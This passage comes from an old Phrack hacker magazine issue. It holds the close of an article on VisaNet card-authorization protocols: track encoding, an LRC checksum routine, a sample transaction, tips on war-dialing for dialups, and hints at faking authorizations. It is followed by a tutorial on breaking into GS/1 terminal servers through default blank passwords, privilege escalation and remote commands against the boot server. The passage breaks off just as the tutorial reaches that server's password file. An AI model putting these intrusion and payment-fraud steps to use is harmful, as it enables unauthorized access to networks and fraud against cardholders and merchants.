one-for-one representation of the characters read from the track. [sounds like
|
|||
|
they mean it, eh?]
|
|||
|
|
|||
|
7.1 TRACK 1 CHARACTER DEFINITION
|
|||
|
|
|||
|
Table 7.01 provides the ISO 7811-2 track 1 character encoding definitions. This
|
|||
|
"standards" format is a SAMPLE guideline for expected credit card track
|
|||
|
encoding; ATM/debit cards may differ. Actual cards may differ [not], whether
|
|||
|
they are Visa cards or any other issuer's cards.
|
|||
|
|
|||
|
Each character is defined by the six-bit codes listed in Table 7.01.
|
|||
|
|
|||
|
Track 1 can be encoded with up to 79 characters as shown in Figure 7.01
|
|||
|
|
|||
|
+---------------------------------------------------------+
|
|||
|
|SS|FC| PAN|FS| NAME|FS| DATE| DISCRETIONARY DATA |ES|LRC|
|
|||
|
+---------------------------------------------------------+
|
|||
|
|
|||
|
LEGEND:
|
|||
|
|
|||
|
Field Description Length Format
|
|||
|
--------------------------------------------------------------------------------
|
|||
|
SS Start Sentinel 1 %
|
|||
|
FC Format Code ("B" for credit cards) 1 A/N
|
|||
|
PAN Primary Account Number 19 max NUM
|
|||
|
FS Field Separator 1 ^
|
|||
|
NAME Card Holder Name (See NOTE below) 26 max A/N
|
|||
|
FS Field Separator 1 ^
|
|||
|
DATE Expiration Date (YYMM) 4 NUM
|
|||
|
Discretionary Data Option Issuer Data (See NOTE below) variable A/N
|
|||
|
ES End Sentinel 1 ?
|
|||
|
LRC Longitudinal Redundancy Check 1
|
|||
|
---
|
|||
|
Total CAN NOT exceed 79 bytes-----> 79
|
|||
|
--------------------------------------------------------------------------------
|
|||
|
|
|||
|
FIGURE 7.01
|
|||
|
Track 1 Encoding Definition
|
|||
|
|
|||
|
NOTE: The CARD HOLDER NAME field can include a "/" as the surname separator
|
|||
|
and a "." as the title separator
|
|||
|
|
|||
|
The DISCRETIONARY DATA can contain any of the printable characters from
|
|||
|
Table 7.01
|
|||
|
|
|||
|
TABLE 7.01
|
|||
|
Track 1 Character Definition
|
|||
|
|
|||
|
b6 0 0 1 1
|
|||
|
BIT NUMBER b5 0 1 0 1 (a) These character positions
|
|||
|
------------------------------------------- are for hardware use only
|
|||
|
b4 b3 b2 b1 ROW/COL 0 1 2 3
|
|||
|
------------------------------------------- (b) These characters are for
|
|||
|
0 0 0 0 0 SP 0 (a) P country use only, not for
|
|||
|
0 0 0 1 1 (a) 1 A Q international use
|
|||
|
0 0 1 0 2 (a) 2 B R
|
|||
|
0 0 1 1 3 (c) 3 C S (c) These characters are
|
|||
|
0 1 0 0 4 $ 4 D T reserved for added
|
|||
|
0 1 0 1 5 (%) 5 E U graphic use [nifty]
|
|||
|
0 1 1 0 6 (a) 6 F V
|
|||
|
0 1 1 1 7 (a) 7 G W
|
|||
|
1 0 0 0 8 ( 8 H X (%) Start sentinel
|
|||
|
1 0 0 1 9 ) 9 I Y (/) End sentinel
|
|||
|
1 0 1 0 A (a) (a) J Z (^) Field Separator
|
|||
|
1 0 1 1 B (a) (a) K (b) / Surname separator
|
|||
|
1 1 0 0 C (a) (a) L (b) . Title separator
|
|||
|
1 1 0 1 D - (a) M (b) SP Space
|
|||
|
1 1 1 0 E - (a) N (^) +-----------------------+
|
|||
|
1 1 1 1 F / (?) O (a) |PAR|MSB|B5|B4|B3|B2|LSB|
|
|||
|
+-+---+-----------------+
|
|||
|
| |--- Most Significant Bit
|
|||
|
|--- Parity Bit (ODD)
|
|||
|
Read LSB First
|
|||
|
|
|||
|
7.02 TRACK 2 CHARACTER DEFINITION
|
|||
|
|
|||
|
Table 7.02 provides the ISO 7811-2 track 2 character encoding definitions. This
|
|||
|
"standards" format is a SAMPLE guideline for expected credit card track
|
|||
|
encoding; ATM/debit cards may differ. Actual cards may differ, whether they are
|
|||
|
Visa cards or any other issuer's cards.
|
|||
|
|
|||
|
Each character is defined by the four-bit codes listed in Table 7.02.
|
|||
|
|
|||
|
Track 2 can be encoded with up to 40 characters as shown in Figure 7.02.
|
|||
|
|
|||
|
+--------------------------------------------------------+
|
|||
|
|SS| PAN |FS| DATE| DISCRETIONARY DATA |ES|LRC|
|
|||
|
+--------------------------------------------------------+
|
|||
|
|
|||
|
LEGEND:
|
|||
|
|
|||
|
Field Description Length Format
|
|||
|
--------------------------------------------------------------------------------
|
|||
|
SS Start Sentinel 1 0B hex
|
|||
|
PAN Primary Account Number 19 max NUM
|
|||
|
FS Field Separator 1 =
|
|||
|
Discretionary Data Option Issuer Data (See NOTE below) variable A/N
|
|||
|
ES End Sentinel 1 0F hex
|
|||
|
LRC Longitudinal Redundancy Check 1
|
|||
|
---
|
|||
|
Total CAN NOT exceed 40 bytes-----> 40
|
|||
|
--------------------------------------------------------------------------------
|
|||
|
|
|||
|
FIGURE 7.02
|
|||
|
Track 2 Encoding Definition
|
|||
|
|
|||
|
NOTE: The PAN and DATE are always numeric. The DISCRETIONARY DATA can be
|
|||
|
numeric with optional field separators as specified in Table 7.02.
|
|||
|
|
|||
|
|
|||
|
TABLE 7.02
|
|||
|
Track 2 Character Set
|
|||
|
|
|||
|
b4 b3 b2 b1 COL (a) These characters are for
|
|||
|
------------------------------ hardware use only
|
|||
|
0 0 0 0 0 0
|
|||
|
0 0 0 1 1 1 (B) Starting Sentinel
|
|||
|
0 0 1 0 2 2
|
|||
|
0 0 1 1 3 3 (D) Field Separator
|
|||
|
0 1 0 0 4 4
|
|||
|
0 1 0 1 5 5 (F) Ending Sentinel
|
|||
|
0 1 1 0 6 6
|
|||
|
0 1 1 1 7 7
|
|||
|
1 0 0 0 8 8 +---------------------------+
|
|||
|
1 0 0 1 9 9 | PAR | MSB | b3 | b2 | LSB |
|
|||
|
1 0 1 0 A (a) +---------------------------+
|
|||
|
1 0 1 1 B (B) | |
|
|||
|
1 1 0 0 C (a) | |--- Most Significant Bit
|
|||
|
1 1 0 1 D (D) |--- Parity Bit (ODD)
|
|||
|
1 1 1 0 E (a)
|
|||
|
1 1 1 1 F (F) Read LSB first
|
|||
|
|
|||
|
[ tables 7.03a, 7.03b, and 7.04 deleted...
|
|||
|
If you really need a fucking ascii table that bad go buy a book.]
|
|||
|
|
|||
|
[ section 7.05 - Account Data Luhn Check deleted...
|
|||
|
as being unnecessary obtuse and roundabout in explaining how the check works.
|
|||
|
the routine written by crazed luddite and murdering thug is much clearer. ]
|
|||
|
|
|||
|
7.06 CALCULATING AN LRC
|
|||
|
|
|||
|
When creating or testing the LRC for the read of the card swipe, the
|
|||
|
authorization request record, the debit confirmation record or the VisaNet
|
|||
|
response record; use the following steps to calculate the LRC:
|
|||
|
|
|||
|
1) The value of each bit in the LRC character, excluding the parity bit, is
|
|||
|
defined such that the total count of ONE bits encoded in the corresponding
|
|||
|
bit location of all characters of the data shall be even (this is also known
|
|||
|
as an EXCLUSIVE OR (XOR) operation)
|
|||
|
|
|||
|
For card swipes, include the start sentinel, all the data read and
|
|||
|
the end sentinel.
|
|||
|
|
|||
|
For VisaNet protocol messages, begin with the first character past
|
|||
|
the STX, up to and including the ETX.
|
|||
|
|
|||
|
2) The LRC characters parity bit is not a parity bit for the individual parity
|
|||
|
bits of the data message, but it only the parity bit for the LRC character
|
|||
|
itself. Calculated as an even parity bit.
|
|||
|
|
|||
|
[ i list a routine for calculating an LRC o a string later on in the document ]
|
|||
|
|
|||
|
7.07 TEST DATA FOR RECORD FORMAT "J"
|
|||
|
|
|||
|
The following two sections provide sample data for testing record format "J"
|
|||
|
with the VisaNet dial system.
|
|||
|
|
|||
|
7.07.01 TEST DATA FOR A FORMAT "J" AUTHORIZATION REQUEST
|
|||
|
|
|||
|
Table 7.07a provides a set of test data for record format "J" authorization
|
|||
|
request.
|
|||
|
|
|||
|
TABLE 7.07a
|
|||
|
Test Data For Record Format "J"
|
|||
|
|
|||
|
Test Data Byte # Length Format Field Name
|
|||
|
--------------------------------------------------------------------------------
|
|||
|
J 1 1 A/N Record Format
|
|||
|
0, 2, or 4 2 1 A/N Application Type
|
|||
|
. 3 1 A/N Message Delimiter
|
|||
|
401205 4-9 6 A/N Acquirer BIN
|
|||
|
123456789012 10-21 12 NUM Merchant Number
|
|||
|
0001 * 22-25 4 NUM Store Number
|
|||
|
0001 * 26-29 4 NUM Terminal Number
|
|||
|
5999 30-33 4 NUM Merchant Category Code
|
|||
|
840 34-36 3 NUM Merchant Country Code
|
|||
|
94546 37-41 5 A/N Merchant City Code
|
|||
|
108 42-44 3 NUM Time Zone Differential
|
|||
|
54 45-46 2 A/N Authorization Transaction Code
|
|||
|
12345678 47-54 8 NUM Terminal Identification Number
|
|||
|
Y 55 1 A/N Payment Service Indicator
|
|||
|
0001 * 56-59 4 NUM Transaction Sequence Number
|
|||
|
@ 60 1 A/N Cardholder Identification Code
|
|||
|
D, H, T, or X 61 1 A/N Account Data Source
|
|||
|
Track or Customer Data Field
|
|||
|
Manual Data
|
|||
|
"FS" N.A. 1 "FS" Field Separator
|
|||
|
0000123 N.A. 0 to 43 A/N Transaction Amount
|
|||
|
"FS" N.A. 1 "FS" Field Separator
|
|||
|
ER N.A. 0 or 2 A/N Device Code/Industry code
|
|||
|
"FS" N.A. 1 "FS" Field Separator
|
|||
|
N.A. 0 or 6 NUM Issuing/Receiving Institution ID
|
|||
|
"FS" N.A. 1 "FS" Field Separator
|
|||
|
000 N.A. 3 to 12 NUM Secondary Amount (Cashback)
|
|||
|
"FS" N.A. 1 "FS" Field Separator
|
|||
|
--------------------------------------------------------------------------------
|
|||
|
|
|||
|
NOTE:* Denotes fields that are returned in the response message
|
|||
|
|
|||
|
7.07.2 RESPONSE MESSAGE FOR TEST DATA
|
|||
|
|
|||
|
Table 7.07b provides the response message for the test data provided in section
|
|||
|
7.07.1.
|
|||
|
|
|||
|
TABLE 7.07b
|
|||
|
Response Message For Test Data - Record Format "J"
|
|||
|
|
|||
|
Test Data Byte # Length Format Field Name
|
|||
|
--------------------------------------------------------------------------------
|
|||
|
A, Y, N, or * 1 1 A/N Payment Service Indicator
|
|||
|
"space"
|
|||
|
0001 * 2-5 4 NUM Store Number
|
|||
|
0001 * 6-9 4 NUM Terminal Number
|
|||
|
5 * 1 1 A/N Authorization Source Code
|
|||
|
0001 * 11-14 4 NUM Transaction Sequence Number
|
|||
|
00 * 15-16 2 A/N Response Code
|
|||
|
12AB45 * 17-22 6 A/N Approval Code
|
|||
|
111992 * 23-28 6 NUM Transaction Date (MMDDYY)
|
|||
|
AP ______ 29-44 16 A/N Authorization Response Message
|
|||
|
0, Sp, or "FS" 45 1 A/N AVS Result Code
|
|||
|
*Variable 0 or 15 NUM Transaction Identifier
|
|||
|
"FS" "FS" Field Separator
|
|||
|
*Variable 0 or 4 A/N Validation Code
|
|||
|
"FS" "FS" Field Separator
|
|||
|
--------------------------------------------------------------------------------
|
|||
|
NOTE: * Move to data capture record for VisaNet Central Data Capture (CDC)
|
|||
|
--------------------------------------------------------------------------------
|
|||
|
|
|||
|
[ section two ]
|
|||
|
[ finding visanet ]
|
|||
|
|
|||
|
finding visanet isn't hard, but it can be tedious. visanet rents time off of
|
|||
|
compuserve and X.25 networks. the compuserve nodes used are not the same
|
|||
|
as their information service, cis. to identify a visanet dialup after
|
|||
|
connecting, watch for three enq characters and a three second span to hangup.
|
|||
|
if you've scanned out a moderate portion of your area code, you probably have a
|
|||
|
few dialups. one idea is to write a short program to dial all the connects you
|
|||
|
have marked as garbage or worthless [ you did keep em, right? ] and wait
|
|||
|
for the proper sequence. X.25 connections should work similarly, but i don't
|
|||
|
know for sure. read the section on visanet usage for other dialup sources.
|
|||
|
|
|||
|
[ section three ]
|
|||
|
[ visanet link level protocol ]
|
|||
|
|
|||
|
messages to/from visanet have a standard format:
|
|||
|
|
|||
|
stx - message - etx - lrc
|
|||
|
|
|||
|
the message portion is the record formats covered in section one. lrc values
|
|||
|
are calculated starting with the first byte of message, going up to and
|
|||
|
including the etx character. heres an algorithm that calculates the lrc for a
|
|||
|
string. note: in order to work with the visanet protocols, append etx to the
|
|||
|
string before calling this function.
|
|||
|
|
|||
|
unsigned char func_makelrc(char *buff)
|
|||
|
{
|
|||
|
int i;
|
|||
|
char ch, *p;
|
|||
|
|
|||
|
ch = 0;
|
|||
|
p = buff;
|
|||
|
|
|||
|
for(;;) {
|
|||
|
ch = (ch^(*p));
|
|||
|
p++;
|
|||
|
if(!(*p))
|
|||
|
break;
|
|||
|
}
|
|||
|
|
|||
|
return ch;
|
|||
|
}
|
|||
|
|
|||
|
for a single authorization exchange, the easiest kind of transaction, the
|
|||
|
sequence goes like this:
|
|||
|
|
|||
|
host enq stx-response-etx-lrc eot
|
|||
|
term stx-request-etx-lrc ack
|
|||
|
<disconnect>
|
|||
|
|
|||
|
matching this sequence with test record formats from section one, 7.07, heres
|
|||
|
an ascii representation of a transaction. control characters denoted in <>'s.
|
|||
|
[of course, you wouldn't really have a carriage return in middle of a message.
|
|||
|
duh. ] this transaction would be for card number 4444111122223333 with an
|
|||
|
expiration date of 04/96. the purchase amount is $1.23. visanet responds with
|
|||
|
an approval code of 12ab45.
|
|||
|
|
|||
|
host: <enq>
|
|||
|
|
|||
|
term: <stx>J0.401205123456789012000100015999840945461085412345678Y0001@H444411
|
|||
|
1122223333<fs>0496<fs>0000123<fs>ER<fs><fs>000<fs><etx><lrc>
|
|||
|
|
|||
|
host: <stx>Y00010001500010012AB45111992APPROVAL 12AB45123456789012345<fs>
|
|||
|
ABCD<fs><etx><lrc>
|
|||
|
|
|||
|
term: <ack>
|
|||
|
|
|||
|
host: <eot>
|
|||
|
|
|||
|
authorizing multiple transactions during one connect session is only slightly
|
|||
|
more complicated. the etx character on all messages sent to visanet are changed
|
|||
|
to etb and the application type is changed from '0' to '2' [section one 4.02].
|
|||
|
instead of responding after a transaction with eot, visanet instead polls the
|
|||
|
terminal again with enq. this continues until the terminal either changes back
|
|||
|
to the single transaction format or issues an eot to the host.
|
|||
|
|
|||
|
heres a short list of all control characters used:
|
|||
|
|
|||
|
stx: start-of-text, first message framing character signaling message start
|
|||
|
etx: end-of-text, the frame ending character the last message of a sequence
|
|||
|
eot: end-of-transmission, used to end an exchange and signal disconnect
|
|||
|
enq: enquiry, an invitation to transmit a message or retransmit last item
|
|||
|
ack: affirmative acknowledgment, follows correct reception of message
|
|||
|
nak: negative acknowledgment, used to indicate that the message was not
|
|||
|
understood or was received with errors
|
|||
|
syn: delay character, wait thirty seconds
|
|||
|
etb: end-of-block, the end framing character used to signal the end of a message
|
|||
|
within a multiple message sequence
|
|||
|
|
|||
|
other quick notes: visanet sometimes sends ack before stx on responses
|
|||
|
lrc characters can hold any value, such as stx, nak, etc
|
|||
|
visanet can say goodbye at any time by sending eot
|
|||
|
people can get very anal about error flow diagrams
|
|||
|
|
|||
|
[ section four ]
|
|||
|
[ half the story; central data capture ]
|
|||
|
|
|||
|
a full transaction requires two steps, one of which is described in this
|
|||
|
document: getting the initial authorization. an authorization does basically
|
|||
|
nothing to a person's account. oh, you could shut somebody's account down for
|
|||
|
a day or two by requesting a twenty thousand dollar authorization, but no other
|
|||
|
ill effects would result. central data capture, the second and final step in a
|
|||
|
transaction, needs information from both the authorization request and
|
|||
|
response, which is used to generate additional data records. these records are
|
|||
|
then sent to visanet by the merchant in a group, usually at the end of each day.
|
|||
|
|
|||
|
[ section five ]
|
|||
|
[ common applications ]
|
|||
|
|
|||
|
access to visanet can be implemented in a number of ways: directly on a pos
|
|||
|
terminal, indirectly via a lan, in a hardware specific device, or any
|
|||
|
permutation possible to perform the necessary procedures. card swipers commonly
|
|||
|
seen at malls are low tech, leased at around fifty dollars per month, per
|
|||
|
terminal. they have limited capacity, but are useful in that all of the
|
|||
|
information necessary for transactions is self contained. dr delam and maldoror
|
|||
|
found this out, and were delighted to play the role of visanet in fooling the
|
|||
|
little device. close scrutiny of section one reveals atm formats, phone order
|
|||
|
procedures, and new services such as direct debit from checking/savings and
|
|||
|
checks by phone. start noticing the stickers for telecheck and visa atm cards,
|
|||
|
and you're starting to get the picture.
|
|||
|
|
|||
|
[ section seven ]
|
|||
|
[ brave new world ]
|
|||
|
|
|||
|
could it be? yes, expiration dates really don't matter....
|
|||
|
this article written to thank previous Phrack writers...
|
|||
|
please thank me appropriately...
|
|||
|
800#s exist...
|
|||
|
other services exist... mastercard runs one...
|
|||
|
never underestimate the power of asking nicely...
|
|||
|
numerous other formats are available... see section one, 3.0 for hints...
|
|||
|
never whistle while you're pissing... ==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 17 of 28
|
|||
|
|
|||
|
****************************************************************************
|
|||
|
|
|||
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|||
|
[<> <>]
|
|||
|
[<> ----+++===::: GETTiN' D0wN 'N D1RTy wiT Da GS/1 :::===+++---- <>]
|
|||
|
[<> <>]
|
|||
|
[<> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <>]
|
|||
|
[<> <>]
|
|||
|
[<> Brought to you by: <>]
|
|||
|
[<> [)elam0 Labz, Inc. and ChURcH oF ThE Non-CoNForMisT <>]
|
|||
|
[<> <>]
|
|||
|
[<> Story line: Maldoror -n- [)r. [)elam <>]
|
|||
|
[<> Main Characters: Menacing Maldoror & The Evil [)r. [)elam <>]
|
|||
|
[<> Unix Technical Expertise: Wunder-Boy [)elam <>]
|
|||
|
[<> Sysco Technishun: Marvelous Maldoror <>]
|
|||
|
[<> <>]
|
|||
|
[<> Look for other fine [)elamo Labz and ChURcH oF ThE <>]
|
|||
|
[<> Non-CoNForMisT products already on the market such as <>]
|
|||
|
[<> DEPL (Delam's Elite Password Leecher), NUIA (Maldoror's <>]
|
|||
|
[<> Tymnet NUI Attacker), TNET.SLT (Delam's cheap0 Telenet <>]
|
|||
|
[<> skanner for Telix), PREFIX (Maldoror's telephone prefix <>]
|
|||
|
[<> identification program), and various other programs and <>]
|
|||
|
[<> philez written by Dr. Delam, Maldoror, Green Paradox, <>]
|
|||
|
[<> El Penga, Hellpop, and other certified DLI and CNC members. <>]
|
|||
|
[<> <>]
|
|||
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|||
|
|
|||
|
Index
|
|||
|
========================================
|
|||
|
|
|||
|
1. Finding and identifying a GS/1
|
|||
|
2. Getting help
|
|||
|
3. Gaining top privilege access
|
|||
|
4. Finding the boot server
|
|||
|
5. Connecting to the boot server
|
|||
|
6. Getting the boot server password file
|
|||
|
7. Other avenues
|
|||
|
|
|||
|
|
|||
|
----------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
Here's hacking a GS/1 made EZ (for the sophisticated hacker) It is
|
|||
|
advisable to fill your stein with Sysco and pay close attention... if
|
|||
|
Sysco is not available in your area, Hacker Pschorr beer will work
|
|||
|
almost as good... (especially Oktoberfest variety)
|
|||
|
|
|||
|
|
|||
|
What is a GS/1?
|
|||
|
---------------
|
|||
|
A GS/1 allows a user to connect to various other computers... in other
|
|||
|
words, it's a server, like a DEC or Xyplex.
|
|||
|
|
|||
|
|
|||
|
So why hack it?
|
|||
|
---------------
|
|||
|
Cuz itz there... and plus you kan access all sortz of net stuph fer
|
|||
|
phree. (QSD @ 208057040540 is lame and if you connect to it, you're
|
|||
|
wasting the GS/1.. the French fone police will fly over to your country
|
|||
|
and hunt you down like a wild pack of dogs, then hang you by your own
|
|||
|
twisted pair.)
|
|||
|
|
|||
|
|
|||
|
What to do:
|
|||
|
-----------
|
|||
|
|
|||
|
|
|||
|
|
|||
|
+--------------------------------------+
|
|||
|
+ #1. Finding and identifying a GS/1 +
|
|||
|
+--------------------------------------+
|
|||
|
|
|||
|
Find a GS/1 .. they're EZ to identify.. they usually have a prompt of
|
|||
|
GS/1, though the prompt can be set to whatever you want it to be. A
|
|||
|
few years ago there were quite a number of GS/1's laying around on
|
|||
|
Tymnet and Telenet... you can still find a few if you scan the right
|
|||
|
DNIC's. (If you don't know what the hell I'm talking about, look at
|
|||
|
some old Phracks and LOD tech. journals.)
|
|||
|
|
|||
|
The prompt will look similar to this:
|
|||
|
|
|||
|
(!2) GS/1>
|
|||
|
|
|||
|
(The (!2) refers to the port you are on)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
+--------------------+
|
|||
|
+ #2. Getting help +
|
|||
|
+--------------------+
|
|||
|
|
|||
|
First try typing a '?' to display help items.
|
|||
|
|
|||
|
A help listing looks like this:
|
|||
|
|
|||
|
> (!2) GS/1>?
|
|||
|
> Connect <address>[,<address>] [ ECM ] [ Q ]
|
|||
|
> DO <macro-name>
|
|||
|
> Echo <string>
|
|||
|
> Listen
|
|||
|
> Pause [<seconds>]
|
|||
|
> PIng <address> [ timeout ]
|
|||
|
> SET <param-name> = <value> ...
|
|||
|
> SHow <argument> ...
|
|||
|
|
|||
|
At higher privileges such as global (mentioned next) the help will
|
|||
|
look like this (note the difference in the GS/1 prompt with a # sign):
|
|||
|
|
|||
|
> (!2) GS/1# ?
|
|||
|
> BRoadcast ( <address> ) <string>
|
|||
|
> Connect ( <address> ) <address>[,<address>] [ ECM ] [ Q ]
|
|||
|
> DEFine <macro-name> = ( <text> )
|
|||
|
> DisConnect ( <address> ) [<session number>]
|
|||
|
> DO ( <address> ) <macro-name>
|
|||
|
> Echo <string>
|
|||
|
> Listen ( <address> )
|
|||
|
> Pause [<seconds>]
|
|||
|
> PIng <address> [ timeout ]
|
|||
|
> ReaD ( <address> ) <option> <parameter>
|
|||
|
> REMOTE <address>
|
|||
|
> ROtary ( <address> ) !<rotary> [+|-]= !<portid>[-!<portid>] , ...
|
|||
|
> SAve ( <address> ) <option> <filename>
|
|||
|
> SET ( <address> ) <param-name> = <value> ...
|
|||
|
> SETDefault ( <address> ) [<param-name> = <value>] ...
|
|||
|
> SHow ( <address> ) <argument> ...
|
|||
|
> UNDefine ( <address> ) <macro-name>
|
|||
|
> UNSave ( <address> ) <filename>
|
|||
|
> ZeroMacros ( <address> )
|
|||
|
> ZeroStats ( <address> )
|
|||
|
|
|||
|
Additional commands under global privilege are: BRoadcast, DEFine,
|
|||
|
DisConnect, ReaD, REMOTE, ROtary, UNDefine, UNSave, ZeroMacros,
|
|||
|
ZeroStats, and a few extra options under the normal user commands.
|
|||
|
|
|||
|
If you need in-depth help for any of the commands, you can again use the
|
|||
|
'?' in the following fashion:
|
|||
|
|
|||
|
> (!2) GS/1>sho ?
|
|||
|
> SHow ADDRess
|
|||
|
> SHow ClearingHouseNames [ <name> [ @ <domain> [@ <organ.> ] ] ]
|
|||
|
> SHow DefaultParameters [<param-name> ...]
|
|||
|
> SHow GLobalPARameters
|
|||
|
> SHow NetMAP [ Short | Long ]
|
|||
|
> SHow PARAmeterS [<param-name> ...]
|
|||
|
> SHow <param-name> ...
|
|||
|
> SHow SESsions [ P ]
|
|||
|
> SHow VERSion
|
|||
|
|
|||
|
> (!2) GS/1>sh add?
|
|||
|
> SHow ADDRess
|
|||
|
|
|||
|
> (!2) GS/1>sh add
|
|||
|
> ADDRess = &000023B5%07000201E1D7!2
|
|||
|
|
|||
|
"sh add" displays your own network, address and port number.
|
|||
|
|
|||
|
The network is 000023B5
|
|||
|
The address is 07000201E1D7
|
|||
|
The port number is 2
|
|||
|
|
|||
|
|
|||
|
|
|||
|
+------------------------------------+
|
|||
|
+ #3. Gaining top privilege access +
|
|||
|
+------------------------------------+
|
|||
|
|
|||
|
Figure out the global password.
|
|||
|
|
|||
|
Do a "set priv=global" command.
|
|||
|
|
|||
|
Note:
|
|||
|
----
|
|||
|
There are 3 states to set priv to: user, local, and global. Global is
|
|||
|
the state with the most privilege. When you attain global privilege,
|
|||
|
your prompt will change to have a '#' sign at the end of it.. this means
|
|||
|
you have top priceless (similar to *nix's super user prompt).
|
|||
|
|
|||
|
The GS/1 will prompt you for a password. The default password on GS/1's
|
|||
|
is to have no password at all... The GS/1 will still prompt you for a
|
|||
|
password, but you can enter anything at this point if the password was
|
|||
|
never set.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
+-------------------------------+
|
|||
|
+ #4. Finding the boot server +
|
|||
|
+-------------------------------+
|
|||
|
|
|||
|
Figure out the boot server address available from this GS/1 ..
|
|||
|
|
|||
|
The boot server is what lies under the GS/1. We've found that GS/1's are
|
|||
|
actually run on a Xenix operating system.. (which is of course a nice
|
|||
|
phamiliar territory) It's debatable whether all GS/1's are run on Xenix or
|
|||
|
not as we have yet to contact the company. (We may put out a 2nd file going
|
|||
|
into more detail.)
|
|||
|
|
|||
|
Do a "sh b" or "sh global" as shown in the following examples:
|
|||
|
|
|||
|
> (!2) GS/1# sh b
|
|||
|
> BAud = 9600 BootServerAddress = &00000000%070002017781
|
|||
|
> BReakAction = ( FlushVC, InBand ) BReakChar = Disabled
|
|||
|
> BSDelay = None BUffersize = 82
|
|||
|
|
|||
|
> (!2) GS/1# sh global
|
|||
|
> ...............................Global Parameters............................
|
|||
|
> DATE = Wed Jun 22 21:16:45 1994 TimeZone = 480 minutes
|
|||
|
> DaylightSavingsTime = 0 minutes LogoffStr = "L8r laM3r"
|
|||
|
> WelcomeString = "Welcome to your haqued server (!2), Connected to "
|
|||
|
> DOmain = "thelabz" Organization = "delam0"
|
|||
|
> PROmpt = "GS/1>" NMPrompt = "GS/1# "
|
|||
|
> LocalPassWord = "" GlobalPassWord = "haque-me"
|
|||
|
> NetMapBroadcast = ON MacType = EtherNET
|
|||
|
> CONNectAudit = ON ERRorAudit = ON
|
|||
|
> AUditServerAddress = &000031A4%07000200A3D4
|
|||
|
> AUditTrailType = Local
|
|||
|
> BootServerAddress = &00000000%070002017781
|
|||
|
|
|||
|
Side note: the GlobalPassWord is "haque-me" whereas the LocalPassWord is ""
|
|||
|
... these are the actual passwords that need to be entered (or in the case
|
|||
|
of the LocalPassWord, "" matches any string). You'll only be able to
|
|||
|
"sh global" after a successful "set priv=global".
|
|||
|
|
|||
|
Now that you have the boot server address, the next step is enabling
|
|||
|
communication to the boot server.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
+-------------------------------------+
|
|||
|
+ #5. Connecting to the boot server +
|
|||
|
+-------------------------------------+
|
|||
|
|
|||
|
Do a REMOTE <address> where address is the address of the machine you
|
|||
|
want to issue remote commands to.
|
|||
|
|
|||
|
> (!2) GS/1# REMOTE %070002017781
|
|||
|
> (!2) Remote: ?
|
|||
|
> BInd <address> [-f <bootfile>] [-l <loader>] [<nports>]
|
|||
|
> BRoadcast ( <address> ) "<string>"
|
|||
|
> CoPyfile [<address>:]<pathname> [<address>:][<pathname>]
|
|||
|
> LiSt [ -ls1CR ] [<pathname> ...]
|
|||
|
> MoVe <pathname> <pathname>
|
|||
|
> NAme <clearinghouse name> = <address>[,<address>]...
|
|||
|
> Ping <address> [timeout]
|
|||
|
> ReMove <pathname> ...
|
|||
|
> SET [( <address> )] <param-name> = <value> ...
|
|||
|
> SETDefault <param-name> = <value> ...
|
|||
|
> SHow <argument>
|
|||
|
> UNBind <address>
|
|||
|
> UNDefine <macro name>
|
|||
|
> UNName <name>
|
|||
|
> ZeroStats
|
|||
|
> <BREAK> (to leave remote mode)
|
|||
|
|
|||
|
Your prompt changes from "(!2) GS/1# " to "(!2) Remote: "... this means
|
|||
|
you will be issuing commands to whatever remote machine you specified
|
|||
|
by the REMOTE <address> command.
|
|||
|
|
|||
|
Notice for this case, the boot server's address was used.
|
|||
|
|
|||
|
When you get the REMOTE: prompt, you can issue commands that will be
|
|||
|
executed on the remote machine. Try doing a '?' to see if it's another
|
|||
|
GS/1.. if not, try doing 'ls' to see if you have a *nix type machine.
|
|||
|
|
|||
|
Also notice that the help commands on the remote are not the same as
|
|||
|
those for the GS/1 (though, if you establish a remote link with another
|
|||
|
GS/1 they will be the same).
|
|||
|
|
|||
|
> (!2) Remote: ls -l
|
|||
|
> total 1174
|
|||
|
> drwxrwxrwx 2 ncs ncs 160 Aug 17 1989 AC
|
|||
|
> drwxrwxrwx 2 ncs ncs 5920 Jun 5 00:00 AUDIT_TRAIL
|
|||
|
> drwxrwxrwx 2 ncs ncs 96 Jun 5 01:00 BACKUP
|
|||
|
> drwxrwxrwx 2 ncs ncs 240 Jun 4 04:42 BIN
|
|||
|
> drwxrwxrwx 2 ncs ncs 192 Jun 4 04:13 CONFIGS
|
|||
|
> drwxrwxrwx 2 ncs ncs 64 Aug 17 1989 DUMP
|
|||
|
> drwxrwxrwx 2 ncs ncs 80 Aug 17 1989 ETC
|
|||
|
> drwxrwxrwx 2 ncs ncs 160 Jun 4 04:13 GLOBALS
|
|||
|
> -rw-r--r-- 1 ncs ncs 228 Jun 5 00:59 btdata
|
|||
|
> -rw-r--r-- 1 ncs ncs 8192 Jun 8 1993 chnames.dir
|
|||
|
> -rw-r--r-- 1 ncs ncs 11264 Jun 1 13:41 chnames.pag
|
|||
|
> drwxrwxrwx 2 ncs ncs 48 Jun 5 00:00 dev
|
|||
|
> drwx------ 2 bin bin 1024 Aug 17 1989 lost+found
|
|||
|
> -rw-rw-rw- 1 ncs ncs 557056 Mar 23 1992 macros
|
|||
|
> -rw-r--r-- 1 ncs ncs 512 Oct 22 1993 passwd
|
|||
|
|
|||
|
Look familiar?? If not, go to the nearest convenient store and buy the
|
|||
|
a 12 pack of the cheapest beer you can find.. leave your computer
|
|||
|
connected so you hurry back, and slam eight or nine cold onez... then
|
|||
|
look at the screen again.
|
|||
|
|
|||
|
You're basically doing a Remote Procedure Call for ls to your Xenix boot
|
|||
|
server.
|
|||
|
|
|||
|
Notice at this point that the "passwd" is not owned by root. This is
|
|||
|
because this is not the system password file, and you are not in the
|
|||
|
"/etc" directory... (yet)
|
|||
|
|
|||
|
